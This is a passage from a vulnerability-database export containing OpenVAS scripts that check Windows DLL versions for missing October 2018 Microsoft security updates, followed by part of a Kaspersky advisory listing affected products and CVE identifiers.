value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-10 10:22:26 +0530 (Wed, 10 Oct 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4462926)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4462926\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Filter Manager improperly handles objects in memory.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - Windows Media Player improperly discloses file information.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in memory.\n\n - DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Windows Theme API does not properly decompress files.\n\n - NTFS improperly checks access.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions, gain the same user rights\n as the current user, obtain information to further compromise the user's system,\n improperly discloses file information and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012 R2\n\n Microsoft Windows 8.1 for 32-bit/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4462926\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"urlmon.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"11.0.9600.19155\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\urlmon.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 11.0.9600.19155\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:15", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4462919", "modified": "2019-05-03T00:00:00", "published": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310814080", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814080", "title": "Microsoft Windows Multiple Vulnerabilities (KB4462919)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4462919)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814080\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8494\", \"CVE-2018-8495\", \"CVE-2018-8497\", \"CVE-2018-8503\",\n \"CVE-2018-8320\", \"CVE-2018-8329\", \"CVE-2018-8330\", \"CVE-2018-8333\",\n \"CVE-2018-8411\", \"CVE-2018-8413\", \"CVE-2018-8423\", \"CVE-2018-8453\",\n \"CVE-2018-8460\", \"CVE-2018-8472\", \"CVE-2018-8481\", \"CVE-2018-8482\",\n \"CVE-2018-8484\", \"CVE-2018-8486\", \"CVE-2018-8489\", \"CVE-2018-8491\",\n \"CVE-2018-8492\", \"CVE-2018-8493\", \"CVE-2018-8505\", \"CVE-2018-8506\",\n \"CVE-2018-8509\", \"CVE-2018-8530\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-10 09:28:04 +0530 (Wed, 10 Oct 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4462919)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4462919\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Media Player improperly discloses file information.\n\n - DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in memory.\n\n - Windows Subsystem for Linux fails to properly handle objects in memory.\n\n - Microsoft Edge improperly handles requests of different origins.\n\n - Windows Theme API does not properly decompress files.\n\n - NTFS improperly checks access.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in memory.\n\n - Windows Kernel improperly handles objects in memory.\n\n - Windows Shell improperly handles URIs.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - An input validation error in Device Guard.\n\n - Filter Manager improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Microsoft Edge improperly accesses objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Microsoft Windows Codecs Library improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions, gain the same user rights\n as the current user, obtain information to further compromise the user's system,\n improperly discloses file information and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 Version 1803 for 32-bit Systems\n\n Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4462919\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17134.0\", test_version2:\"11.0.17134.344\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17134.0 - 11.0.17134.344\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:14", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4462918", "modified": "2019-05-03T00:00:00", "published": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310814079", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814079", "title": "Microsoft Windows Multiple Vulnerabilities (KB4462918)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4462918)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814079\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8494\", \"CVE-2018-8495\", \"CVE-2018-8497\", \"CVE-2018-8503\",\n \"CVE-2018-8320\", \"CVE-2018-8330\", \"CVE-2018-8333\", \"CVE-2018-8411\",\n \"CVE-2018-8413\", \"CVE-2018-8423\", \"CVE-2018-8453\", \"CVE-2018-8460\",\n \"CVE-2018-8472\", \"CVE-2018-8481\", \"CVE-2018-8482\", \"CVE-2018-8484\",\n \"CVE-2018-8486\", \"CVE-2018-8489\", \"CVE-2018-8490\", \"CVE-2018-8491\",\n \"CVE-2018-8492\", \"CVE-2018-8493\", \"CVE-2018-8505\", \"CVE-2018-8506\",\n \"CVE-2018-8509\", \"CVE-2018-8512\", \"CVE-2018-8530\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-10 09:07:36 +0530 (Wed, 10 Oct 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4462918)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4462918\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Media Player improperly discloses file information.\n\n - DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in memory.\n\n - Microsoft Edge improperly handles requests of different origins.\n\n - Windows Theme API does not properly decompress files.\n\n - NTFS improperly checks access.\n\n - Edge Content Security Policy (CSP) fails to properly validate certain specially\n crafted documents.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in memory.\n\n - Windows Kernel improperly handles objects in memory.\n\n - Windows Shell improperly handles URIs.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - An improper input validation in Device Guard.\n\n - Filter Manager improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Microsoft Edge improperly accesses objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Microsoft Windows Codecs Library improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, bypass security restrictions, gain the same user\n rights as the current user, determine the presence of files on disk, escalate\n privileges and disclose sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 Version 1709 for 32-bit Systems\n\n Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4462918\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.725\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.725\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4462917", "modified": "2019-05-03T00:00:00", "published": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310814081", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814081", "title": "Microsoft Windows Multiple Vulnerabilities (KB4462917)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4462917)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814081\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8495\", \"CVE-2018-8497\", \"CVE-2018-8503\", \"CVE-2018-8505\",\n \"CVE-2018-8320\", \"CVE-2018-8330\", \"CVE-2018-8333\", \"CVE-2018-8411\",\n \"CVE-2018-8413\", \"CVE-2018-8423\", \"CVE-2018-8453\", \"CVE-2018-8460\",\n \"CVE-2018-8472\", \"CVE-2018-8481\", \"CVE-2018-8482\", \"CVE-2018-8484\",\n \"CVE-2018-8486\", \"CVE-2018-8489\", \"CVE-2018-8490\", \"CVE-2018-8491\",\n \"CVE-2018-8492\", \"CVE-2018-8493\", \"CVE-2018-8494\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-10 09:48:26 +0530 (Wed, 10 Oct 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4462917)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4462917\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Media Player improperly discloses file information.\n\n - DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in memory.\n\n - Windows Theme API does not properly decompress files.\n\n - NTFS improperly checks access.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in memory.\n\n - Windows Kernel improperly handles objects in memory.\n\n - Windows Shell improperly handles URIs.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - An input validation error in Device Guard.\n\n - Filter Manager improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Chakra scripting engine handles objects in memory in Microsoft Edge.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions, gain the same user rights\n as the current user, obtain information to further compromise the user's system,\n improperly discloses file information and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1607 x32/x64\n\n Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4462917\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.2550\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.2550\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4462937", "modified": "2019-05-03T00:00:00", "published": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310814082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814082", "title": "Microsoft Windows Multiple Vulnerabilities (KB4462937)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4462937)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814082\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8495\", \"CVE-2018-8497\", \"CVE-2018-8503\", \"CVE-2018-8505\",\n \"CVE-2018-8330\", \"CVE-2018-8333\", \"CVE-2018-8411\", \"CVE-2018-8413\",\n \"CVE-2018-8423\", \"CVE-2018-8453\", \"CVE-2018-8460\", \"CVE-2018-8472\",\n \"CVE-2018-8481\", \"CVE-2018-8482\", \"CVE-2018-8484\", \"CVE-2018-8486\",\n \"CVE-2018-8489\", \"CVE-2018-8490\", \"CVE-2018-8491\", \"CVE-2018-8492\",\n \"CVE-2018-8493\", \"CVE-2018-8494\", \"CVE-2018-8512\", \"CVE-2018-8530\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-10 10:00:23 +0530 (Wed, 10 Oct 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4462937)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4462937\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Media Player improperly discloses file information.\n\n - DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in memory.\n\n - Microsoft Edge improperly handles requests of different origins.\n\n - Windows Theme API does not properly decompress files.\n\n - NTFS improperly checks access.\n\n - Edge Content Security Policy (CSP) fails to properly validate certain specially\n crafted documents.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in memory.\n\n - Windows Kernel improperly handles objects in memory.\n\n - Windows Shell improperly handles URIs.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - An input validation error in Device Guard.\n\n - Filter Manager improperly handles objects in memory.\n\n\n - Windows kernel improperly handles objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions, gain the same user rights as\n the current user, obtain information to further compromise the user's system,\n improperly discloses file information and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4462937\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.1386\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.1386\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:43", "bulletinFamily": "info", "description": "### *Detect date*:\n10/09/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to bypass security restrictions, write local files, gain privileges, execute arbitrary code, obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Excel Viewer 2007 Service Pack 3 \nMicrosoft Office 2016 for Mac \nMicrosoft Office 2019 for 32-bit editions \nMicrosoft Office 2019 for 64-bit editions \nMicrosoft Office Compatibility Pack Service Pack 3 \nMicrosoft Office Word Viewer \nMicrosoft PowerPoint Viewer 2007 \nOffice 365 ProPlus for 32-bit Systems \nOffice 365 ProPlus for 64-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1709 for 64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2016 \nWindows Server 2016 (Server Core installation) \nWindows Server 2019 \nWindows Server 2019 (Server Core installation) \nWindows Server, version 1709 (Server Core Installation) \nWindows Server, version 1803 (Server Core Installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2018-8320](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8320>)4.3Critical \n[CVE-2018-8333](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8333>)7.0Critical \n[CVE-2018-8423](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8423>)7.8Critical \n[CVE-2018-8432](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8432>)5.0Critical \n[CVE-2018-8486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8486>)4.7Critical \n[CVE-2018-8330](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8330>)5.5Critical \n[CVE-2018-8493](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8493>)7.5Critical \n[CVE-2018-8472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8472>)5.5Critical \n[CVE-2018-8492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8492>)5.3Critical \n[CVE-2018-8481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8481>)3.1Critical \n[CVE-2018-8482](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8482>)3.1Critical \n[CVE-2018-8506](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8506>)5.5Critical \n[CVE-2018-8490](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8490>)8.4Critical \n[CVE-2018-8413](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8413>)7.8Critical \n[CVE-2018-8329](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8329>)7.8Critical \n[CVE-2018-8453](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8453>)7.8Critical \n[CVE-2018-8411](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8411>)7.0Critical \n[CVE-2018-8494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8494>)8.8Critical \n[CVE-2018-8495](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8495>)7.5Critical 